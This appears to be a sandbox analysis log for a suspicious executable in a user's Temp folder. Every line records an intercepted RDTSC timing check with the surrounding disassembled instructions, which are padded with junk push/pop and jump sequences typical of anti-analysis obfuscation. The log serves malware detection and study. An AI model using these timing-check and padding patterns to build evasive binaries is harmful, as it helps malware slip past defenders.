Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D5BBF4 second address: D5BC03 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F58F53CD386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D641EC second address: D64234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28981h 0x00000007 jg 00007F58F4C28976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007F58F4C2897Ch 0x00000015 pop edi 0x00000016 push edi 0x00000017 jmp 00007F58F4C28985h 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007F58F4C28976h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D64234 second address: D64238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D6B62B second address: D6B65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28984h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F58F4C28986h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D6B65D second address: D6B665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D6BAB0 second address: D6BAD6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F58F4C28986h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D6BAD6 second address: D6BADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D6BADA second address: D6BAE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D7087C second address: D70880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D70880 second address: D70886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D7044B second address: D70450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D70450 second address: D70455 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D80135 second address: D8014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F58F53CD392h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D83F9C second address: D83FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F58F4C28982h 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jng 00007F58F4C2897Ch 0x0000001a jnp 00007F58F4C28976h 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D867BE second address: D867E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD396h 0x00000009 pop ecx 0x0000000a jl 00007F58F53CD3BEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D867E3 second address: D867E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D867E7 second address: D867F4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D867F4 second address: D867FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D7D69E second address: D7D6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D7D6A2 second address: D7D6B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007F58F4C28978h 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D926BE second address: D926C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DAC454 second address: DAC46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F58F4C2897Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DAC46B second address: DAC472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DAC472 second address: DAC488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F58F4C2897Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DAC488 second address: DAC4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD398h 0x00000009 popad 0x0000000a pushad 0x0000000b je 00007F58F53CD386h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DAC5E3 second address: DAC60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F58F4C2897Fh 0x0000000b popad 0x0000000c jo 00007F58F4C2897Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 js 00007F58F4C2897Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DACA83 second address: DACA88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DACA88 second address: DACA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F58F4C28976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DACFD2 second address: DACFD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DACFD6 second address: DAD003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F58F4C28976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007F58F4C28976h 0x00000013 jmp 00007F58F4C2897Ch 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007F58F4C28978h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB0504 second address: DB050A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB050A second address: DB056E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F58F4C28976h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edx, 5B821F86h 0x00000016 push dword ptr [ebp+122D28B2h] 0x0000001c xor dl, 00000002h 0x0000001f call 00007F58F4C28979h 0x00000024 push ecx 0x00000025 jmp 00007F58F4C28988h 0x0000002a pop ecx 0x0000002b push eax 0x0000002c push ecx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 pop ecx 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F58F4C28981h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB056E second address: DB0572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB0572 second address: DB0578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB0578 second address: DB057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB057D second address: DB05A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C2897Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F4C2897Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB05A2 second address: DB05D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jbe 00007F58F53CD386h 0x00000016 jmp 00007F58F53CD392h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: DB5019 second address: DB503C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F58F4C28985h 0x0000000d jns 00007F58F4C28976h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B001B second address: 54B0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD394h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0033 second address: 54B0051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F58F4C28983h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470EF1 second address: 5470EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470EF7 second address: 5470EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470EFD second address: 5470F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470F01 second address: 5470F67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F58F4C2897Ch 0x00000013 mov ch, 47h 0x00000015 popad 0x00000016 mov bx, F052h 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007F58F4C28988h 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F58F4C28987h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0016 second address: 54C0020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 0D3D9B2Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0020 second address: 54C0060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F58F4C2897Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F58F4C28986h 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5430C6C second address: 5430C79 instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov di, 7A86h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5430C79 second address: 5430C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F58F4C28986h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5430C99 second address: 5430C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5430C9F second address: 5430CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5430CA3 second address: 5430CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F58F53CD399h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F58F53CD393h 0x0000001a pop eax 0x0000001b mov esi, edx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5430CE3 second address: 5430D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F58F4C28980h 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F58F4C28987h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470C58 second address: 5470C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470C5E second address: 5470C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470C64 second address: 5470C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470C68 second address: 5470C9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F58F4C28983h 0x00000014 movzx eax, bx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470C9A second address: 5470CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD391h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5460A80 second address: 5460AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e mov dl, ah 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F58F4C2897Fh 0x0000001a call 00007F58F4C28988h 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B08C2 second address: 54B08C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0623 second address: 54B0650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F58F4C2897Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470CF2 second address: 5470CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470CF8 second address: 5470D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov esi, 3EE6FF47h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470D09 second address: 5470D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470D1C second address: 5470D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 4EC5h 0x00000007 push esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F4C28983h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470D3F second address: 5470D98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F58F53CD393h 0x00000013 and eax, 2BD5047Eh 0x00000019 jmp 00007F58F53CD399h 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0B39 second address: 54B0B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0B3D second address: 54B0B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0B50 second address: 54B0B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28984h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0B68 second address: 54B0B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0B6C second address: 54B0BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F58F4C2897Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F58F4C2897Eh 0x00000016 and ecx, 1493CC98h 0x0000001c jmp 00007F58F4C2897Bh 0x00000021 popfd 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F58F4C2897Bh 0x0000002d mov eax, dword ptr [ebp+08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0BC0 second address: 54B0BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0BC4 second address: 54B0BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
